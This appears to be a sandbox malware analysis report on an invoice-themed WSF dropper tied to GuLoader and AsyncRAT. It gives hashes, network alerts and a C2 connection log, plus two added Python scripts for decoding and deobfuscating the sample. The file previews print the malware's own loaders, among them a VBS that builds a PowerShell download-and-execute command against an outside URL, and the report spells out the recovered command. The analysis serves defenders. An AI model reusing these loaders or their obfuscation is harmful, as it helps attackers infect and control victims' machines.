37f463bf4616ecd445d4a1937da06e19 | WEAREX_IHRACAT.exe | malicious | GuLoader | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | Fordybendes.exe | malicious | Azorult, GuLoader | 192.185.141.13
37f463bf4616ecd445d4a1937da06e19 | AyyPZaqgaZ.exe | malicious | Unknown | 192.185.141.13
                                  No context
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):315
                                  Entropy (8bit):5.308667166542677
                                  Encrypted:false
                                  SSDEEP:6:PI2z8xKWK2z8xKWuR9bGnIvWWk2z8xKWcII1R3KbQO0cvfp1aHI2z8xKW9o22z8P:PJ1W31Wu7SnIOWV1WhI1kbQpcvf81W9T
                                  MD5:2062501BEC7ADC309CD1F6EBD3580828
                                  SHA1:4A9AC3E0C999D58F906A862A8913103BF276BC77
                                  SHA-256:2169D67A0981628B880CB1E75F7A7F3E57F6C0C2FE460DD1F4641F2DFFC0E682
                                  SHA-512:0AC1CB54C8FB199AFD74829CE6DF2AC2A01E8DB4923A70D5B6A4099A5A6A799AA52D8AA53D1D54EAB259108781D380ABB0673A983EA77FF851B4666E51A8B57E
                                  Malicious:true
                                  Reputation:low
                                  Preview:@e%mtOR0ZGTUhkVGJGcFhUVmRSTUZsV%%mtOR0ZGTUhkVGJGcFhUVmRSTUZsV% off..set "ps=powershell.exe"..set "mtOR0ZGTUhkVGJGcFhUVmRSTUZsVms=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"..set "cmd=C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1"..%ps% %mtOR0ZGTUhkVGJGcFhUVmRSTUZsVms% -Command "& '%cmd%'"..exit /b..
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with very long lines (65532), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):721496
                                  Entropy (8bit):2.8359815979042398
                                  Encrypted:false
                                  SSDEEP:3072:4ub2ylcESmDwZmT8VjG3/Dyqr4cwt9aU0rBx2ucmmwc0/Kz0o+i/6n/cEyjBAMDW:fFOTs8TP2LWTM5mH9OdHUb3ngoW
                                  MD5:DD8145AA6657C57C611CF17D7961C4A2
                                  SHA1:8BA331812C538B9410BA8403AB5C7ADE1724AD9D
                                  SHA-256:38D25461337F160AD0066389C93CADCCA66F3E08C04DCE8D2869B019B841B92E
                                  SHA-512:6614621189BB824B337AF5B0C6C667C505A78CCB8CCAFE1EDBB16F3F1775CD357452FFE82CCE4F12D643254E2783957FE08E9B66A9D25C967EDCECD96287A63B
                                  Malicious:true
                                  Reputation:low
                                  Preview:....$Mordexstring_ojj = "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%80%&%00%&%00%&%00%&%0E%&%1F%&%BA%&%0E%&%00%&%B4%&%09%&%CD%&%21%&%B8%&%01%&%4C%&%CD%&%21%&%54%&%68%&%69%&%73%&%20%&%70%&%72%&%6F%&%67%&%72%&%61%&%6D%&%20%&%63%&%61%&%6E%&%6E%&%6F%&%74%&%20%&%62%&%65%&%20%&%72%&%75%&%6E%&%20%&%69%&%6E%&%20%&%44%&%4F%&%53%&%20%&%6D%&%6F%&%64%&%65%&%2E%&%0D%&%0D%&%0A%&%24%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%50%&%45%&%00%&%00%&%4C%&%01%&%03%&%00%&%76%&%6A%&%7A%&%64%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%E0%&%00%&%02%&%01%&%0B%&%01%&%08%&%00%&%00%&%FC%&%00%&%00%&%00%&%0A%&%00%&%00%&%00%&%00%&%00%&%00%&%8E%&%1A%&%01%&%00%&%00%&%20%&%00%&%00%&%00%&%20%&%01%&%00%&%00%&%00%&%40%&%00%&%00%&%20%&%00%&%00%&%00%&%02%&%00%&%00%&%04%&%00%&%00%&%
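The dropped .ps1 above carries its payload as one long string of hex byte pairs joined with "%&%", and the first pairs (4D 5A 90 00 ...) are an MZ header: the script decodes a PE image in memory, which is consistent with the "Injects a PE file into a foreign processes" and RegSvcs.exe entries in the behavior graph. The Python below is an added example, not code from the report or from the sample: it pulls that string out of the script text, decodes it, and reads the PE header fields an analyst checks first (machine, subsystem-independent flags, entry point, image base, alignments). The input is the 195 bytes visible in the preview above, constructed inline; the variable name $Mordexstring_ojj is the sample's, everything else (function names, the truncated assignment line) is mine.

```python
import re
import struct

# Constructed test input: the first 195 bytes of the "$Mordexstring_ojj" value, copied from the
# report's preview of the dropped .ps1 (standard MZ/DOS stub, PE header at offset 0x80).
SAMPLE_PS1_STRING = (
    "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%"
    "B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%"
    "00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%"
    "00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%80%&%00%&%00%&%00%&%"
    "0E%&%1F%&%BA%&%0E%&%00%&%B4%&%09%&%CD%&%21%&%B8%&%01%&%4C%&%CD%&%21%&%54%&%68%&%"
    "69%&%73%&%20%&%70%&%72%&%6F%&%67%&%72%&%61%&%6D%&%20%&%63%&%61%&%6E%&%6E%&%6F%&%"
    "74%&%20%&%62%&%65%&%20%&%72%&%75%&%6E%&%20%&%69%&%6E%&%20%&%44%&%4F%&%53%&%20%&%"
    "6D%&%6F%&%64%&%65%&%2E%&%0D%&%0D%&%0A%&%24%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%"
    "50%&%45%&%00%&%00%&%4C%&%01%&%03%&%00%&%76%&%6A%&%7A%&%64%&%00%&%00%&%00%&%00%&%"
    "00%&%00%&%00%&%00%&%E0%&%00%&%02%&%01%&%0B%&%01%&%08%&%00%&%00%&%FC%&%00%&%00%&%"
    "00%&%0A%&%00%&%00%&%00%&%00%&%00%&%00%&%8E%&%1A%&%01%&%00%&%00%&%20%&%00%&%00%&%"
    "00%&%20%&%01%&%00%&%00%&%00%&%40%&%00%&%00%&%20%&%00%&%00%&%00%&%02%&%00%&%00%&%"
    "04%&%00%&%00%&%"
)
# Constructed: the assignment as it appears at the top of the script (closing quote cut off, as in the preview).
SAMPLE_PS1_SOURCE = '$Mordexstring_ojj = "' + SAMPLE_PS1_STRING

IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000


def extract_hex_blob(ps1_source):
    """Return (variable name, '%&%'-joined hex string) from the script text."""
    m = re.search(r'\$(\w+)\s*=\s*"([0-9A-Fa-f]{2}(?:%&%[0-9A-Fa-f]{2})*)', ps1_source)
    if not m:
        raise ValueError("no '%&%'-delimited hex string found")
    return m.group(1), m.group(2)


def decode_delimited_hex(blob, sep="%&%"):
    """Turn 'XX%&%YY%&%...' into bytes; a dangling separator (truncated preview) is tolerated."""
    return bytes(int(tok, 16) for tok in blob.split(sep) if tok.strip())


def parse_pe_summary(data):
    """Read the COFF and optional-header fields an analyst checks first; raise if not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, sections, timestamp, _symtab, _nsyms, _opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, linker_major, linker_minor, size_of_code = struct.unpack_from("<HBBI", data, opt)
    entry_point, base_of_code = struct.unpack_from("<II", data, opt + 16)
    if magic == 0x10B:    # PE32: BaseOfData at +24, then a 4-byte ImageBase
        image_base, section_alignment, file_alignment = struct.unpack_from("<III", data, opt + 28)
    elif magic == 0x20B:  # PE32+: no BaseOfData, 8-byte ImageBase at +24
        image_base, section_alignment, file_alignment = struct.unpack_from("<QII", data, opt + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return {
        "machine": machine, "sections": sections, "timestamp": timestamp,
        "characteristics": characteristics,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "is_32bit": bool(characteristics & IMAGE_FILE_32BIT_MACHINE),
        "magic": magic, "linker": f"{linker_major}.{linker_minor}",
        "size_of_code": size_of_code, "entry_point": entry_point, "base_of_code": base_of_code,
        "image_base": image_base, "section_alignment": section_alignment,
        "file_alignment": file_alignment,
    }


def carve_pe_from_ps1(ps1_source):
    """Locate, decode and summarise the embedded PE in one step."""
    name, blob = extract_hex_blob(ps1_source)
    data = decode_delimited_hex(blob)
    return name, data, parse_pe_summary(data)


if __name__ == "__main__":
    name, data, info = carve_pe_from_ps1(SAMPLE_PS1_SOURCE)
    print(f"${name}: {len(data)} bytes decoded")
    for key, value in info.items():
        print(f"  {key}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"  {key}: {value}")
```

On the real file the decoded buffer is the complete image (the preview is only its head), so the same function also gives you a file to hash and submit. A 32-bit i386 image with linker version 8.0, a 0x2000 section alignment and entry point just past the code section is the shape a .NET assembly typically has, which fits the report's ".NET source code" signatures; confirming that still requires the CLR data directory, which lies beyond these 195 bytes.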
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):710
                                  Entropy (8bit):4.91192106973685
                                  Encrypted:false
                                  SSDEEP:12:VtAFNUupNO4gLM9Zdt4m1WjhI1O9ZgT3MBdx9Z+/SpR9TzFdWNc5RNey/Spn:/AYupw42uW2T3MP4/QvMmRNZ/6
                                  MD5:6E2F0A89BCEF654A94599920F97E90BB
                                  SHA1:FFB9C0D001F8DD2E3C808240C41A8FEE8B171987
                                  SHA-256:BDC5D6C3EBA7F0DB4E49A30B13C92EDD2DA563209836593B0579867E0E32A1C7
                                  SHA-512:B00E38B4A3161253788CC20F3E79D8CC25F8C5F155A3CEBCFB73B369E266C4932A177C2932B5F63A6F204E7308144AA33ECD5CB320AF05C85BA0437DBCE47619
                                  Malicious:true
                                  Reputation:low
                                  Preview:on error resume next..Function CreateWshShellObj().. Dim objName.. objName = "WScript.Shell".. Set CreateWshShellObj = CreateObject(objName)..End Function....Function GetFilePath().. Dim filePath.. filePath = "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat".. GetFilePath = filePath..End Function....Function GetVisibilitySetting().. Dim visibility.. visibility = 0.. GetVisibilitySetting = visibility..End Function....Function RunFile(wshShellObj, filePath, visibility).. wshShellObj.Run filePath, visibility..End Function....Set wshShellObj = CreateWshShellObj()..filePath = GetFilePath()..visibility = GetVisibilitySetting()..Call RunFile(wshShellObj, filePath, visibility)..
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):526
                                  Entropy (8bit):5.620453843160039
                                  Encrypted:false
                                  SSDEEP:12:WMvt8Vie7JJOaRHNgpTMvo180Y3ohFM2X0YRKU7:WRVikvZRAZ18h3oz/h97
                                  MD5:AC19581F1EA403DF757785454A1FBEDF
                                  SHA1:98930A10D26A35067108F38E16C53741B6CC2C1B
                                  SHA-256:5A8CD7C1A5FCB4884B7E391CD2621D2A839A6BBAAFE3FB5986E2E4CC23D882B3
                                  SHA-512:85F241CC2CD4401704FDEF1DBCB42A8BF40B6F17A151D89449FA52EC22BF9EDDFAA154AF7E56A13295440307A7DBF271429D30BDD6203E154810CFFC71BB76A3
                                  Malicious:false
                                  Reputation:low
                                  Preview:..Dim odqeo(5), qQsxY, i....' 1111111..odqeo(0) = "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B"..odqeo(1) = "456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-"..odqeo(2) = "@-@-@-$-%^(''https://afclifescience-tiurma."..odqeo(3) = "com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRI"..odqeo(4) = "NG');[BYTe[]];IeX($A123+$B456+$C789)"....' 1111111..qQsxY = ""..For i = 0 To 5 - 1.. qQsxY = qQsxY & odqeo(i)..Next..' 1111111..Set Pictures = CreateObject("WScript.Shell")..Pictures.Run "POWeRSHeLL " & qQsxY, 0, True..Set Pictures = Nothing..
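The first-stage VBS above (dropped by wscript.exe) hides its PowerShell command by splitting it across five array elements, concatenating them in a loop, and then letting PowerShell itself reassemble the final call from three variables plus a .RePLACe() of the placeholder "-@-@-@-$-%^" with "ADSTRING", so that the string "DownloadString" never appears in the script. The Python below is an added example, not part of the report or the sample: it replays the VBS concatenation and statically evaluates the small PowerShell subset the stub uses (single-quoted literals, $variables, .Replace, + and IEX) so the download URL can be recovered without executing anything. The input chunks are copied from the preview above; the function names are mine, and the evaluator covers only that subset.

```python
import re

# Constructed input: the five array elements from the report's preview of the first-stage VBS.
STAGE1_CHUNKS = [
    "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B",
    "456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-",
    "@-@-@-$-%^(''https://afclifescience-tiurma.",
    "com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRI",
    "NG');[BYTe[]];IeX($A123+$B456+$C789)",
]

LITERAL = r"'((?:[^']|'')*)'"    # PowerShell single-quoted string; '' is the only escape
REPLACE_CALL = re.compile(r"\.replace\(" + LITERAL + "," + LITERAL + r"\)", re.I)
TERM = re.compile(r"^" + LITERAL + r"((?:\.replace\(" + LITERAL + "," + LITERAL + r"\))*)$", re.I)


def vbs_concat(chunks):
    """Replay the VBS loop `qQsxY = qQsxY & odqeo(i)`: the chunks simply concatenate."""
    return "".join(chunks)


def split_outside_quotes(code, delim):
    """Split on delim, ignoring any delimiter inside a single-quoted string."""
    parts, cur, in_str = [], [], False
    for ch in code:
        if ch == "'":
            in_str = not in_str
        if ch == delim and not in_str:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def unquote(body):
    return body.replace("''", "'")


def eval_term(term, env):
    """A term is $name, or a 'literal' followed by any number of .Replace('old','new') calls."""
    m = re.fullmatch(r"\$(\w+)", term)
    if m:
        return env[m.group(1)]
    m = TERM.match(term)
    if not m:
        raise ValueError(f"unsupported term: {term}")
    value = unquote(m.group(1))
    for old, new in REPLACE_CALL.findall(m.group(2)):
        value = value.replace(unquote(old), unquote(new))   # String.Replace: ordinal, case-sensitive
    return value


def eval_expr(expr, env):
    """String concatenation with + is the only operator this stub needs."""
    return "".join(eval_term(t, env) for t in split_outside_quotes(expr, "+"))


def emulate(ps_code):
    """Walk the statements; return (variables, the string that would be handed to IEX)."""
    env, iex_arg = {}, None
    for stmt in split_outside_quotes(ps_code, ";"):
        if re.fullmatch(r"\[[\w\[\]]+\]", stmt):        # bare type literal such as [BYTe[]]: a no-op
            continue
        m = re.fullmatch(r"\$(\w+)\s*=\s*(.+)", stmt, re.S)
        if m:
            env[m.group(1)] = eval_expr(m.group(2), env)
            continue
        m = re.fullmatch(r"iex\((.*)\)", stmt, re.I | re.S)
        if m:
            iex_arg = eval_expr(m.group(1), env)
            continue
        raise ValueError(f"unsupported statement: {stmt}")
    return env, iex_arg


def recover_stage1_command(chunks):
    _, cmd = emulate(vbs_concat(chunks))
    return cmd


def extract_urls(text):
    return re.findall(r"https?://[^\s'\")]+", text)


if __name__ == "__main__":
    cmd = recover_stage1_command(STAGE1_CHUNKS)
    print(cmd)
    print("download URL:", extract_urls(cmd))
```

The recovered string is the second stage's fetch, IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://afclifescience-tiurma.com/rkem.jpg'), which matches the rkem.jpg URL in the report's memory strings. The stray [BYTe[]] statements and the mixed-case cmdlet names only exist to defeat string matching; an evaluator that tracks variables, as above, is not affected by either.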
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  File type:Unicode text, UTF-8 text, with very long lines (7092), with CRLF line terminators
                                  Entropy (8bit):5.071670029555159
                                  TrID:
                                    File name:Invoice.wsf
                                    File size:92'162 bytes
                                    MD5:0f1b72e0372d3d3e8821218284638861
                                    SHA1:b136b689cb0fbf9558c4b7860ddca264d53c156c
                                    SHA256:20e31873e4b69f416a7c31d9b35be80f8db14e7b28f440a43ca3c294abe892e8
                                    SHA512:b927b9e6a25e5fbc19c86aacb34c9af485bbb90248e150a3565387b03dbd559cd9f20555491082b81535057d2405ea0a3f55e4d8bb7800cc7bd1f3963065c84f
                                    SSDEEP:1536:5ZZZZZZZZZZZVZZZZZZZZZZZEZZZZZZZZZZZzaZZZZZZZZZZZSZZZZZZZZZZZVZ/:Wb
                                    TLSH:4193ADD5B89E02518DC1DE89D97DFE91E60842233F6B1D5367FEAF4C83256BC8607888
                                    File Content Preview:J,,D ,S, ,N ,,,FD ,VV, , I , , MN KR ,, , QC,F, RX , ,,X ,, QR,P , ,,V,,VN ,, C , N , ,,NDI,JQ, H,, W ,G,, YQ,V T,,R ,,MA AW,GUE, H,O MRI,FU,,Y U , ,EI,R, OLK VJC,,,W, , ETF,X, M ,,,N,, O,,C ,J , E C,S, , OIM AX ,,,,C, ,MPHF , ,,M
                                    Icon Hash:68d69b8f86ab9a86
                                    Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                                    2024-08-29T19:42:20.837888+0200 | TCP | 2842478 | ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) | 1 | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
                                    2024-08-29T19:42:20.837888+0200 | TCP | 2030673 | ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) | 1 | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
                                    2024-08-29T19:42:20.837888+0200 | TCP | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
                                    2024-08-29T19:42:20.837888+0200 | TCP | 2035607 | ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) | 1 | 7707 | 49738 | 104.243.37.177 | 192.168.2.4
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 29, 2024 19:42:20.272427082 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837666035 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837683916 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837738037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.837888002 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.837933064 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.844033003 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:20.848906994 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:20.954385996 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:21.007165909 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:21.244656086 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:21.250168085 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:21.250312090 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:21.255875111 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.039297104 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.044239044 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.044327021 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.049129963 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.281816959 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.335367918 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.369343042 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.403124094 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.407970905 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:28.408050060 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:28.412825108 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.820321083 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:34.826013088 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.826071024 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:34.831624985 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.947590113 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:34.991610050 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:35.035994053 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:35.037595034 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:35.042382002 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:35.042443037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:35.047446966 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.712464094 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:41.717464924 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.717516899 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:41.722409964 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.913089037 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:41.960345984 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:42.060848951 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:42.062447071 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:42.072016001 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:42.072071075 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:42.077300072 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.491985083 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.497286081 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.497354984 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.503267050 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.995877981 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.997991085 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.998075008 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.998928070 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:48.998980045 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:48.999144077 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:49.004184008 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:49.004242897 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:49.009082079 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.297785044 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.302731037 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.302789927 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.307590961 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.497576952 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.538512945 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.585830927 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.587119102 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.592099905 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:42:55.592164993 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:42:55.597074032 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.070406914 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.075613976 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.075795889 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.080648899 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.262725115 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.304136038 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.392203093 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.397005081 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.402565002 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:02.402611017 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:02.408102989 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:08.867717981 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.016853094 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.016916037 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.024107933 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.223243952 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.272918940 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.376446009 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.378279924 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.383424997 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:09.383513927 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:09.388448000 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.688054085 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.696911097 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.697005987 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.703406096 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.835916996 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.882267952 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.973450899 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.974860907 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.980318069 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:15.980387926 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:15.985610962 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.476488113 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.482059956 CEST770749738104.243.37.177192.168.2.4
                                    Aug 29, 2024 19:43:22.482146025 CEST497387707192.168.2.4104.243.37.177
                                    Aug 29, 2024 19:43:22.487106085 CEST770749738104.243.37.177192.168.2.4
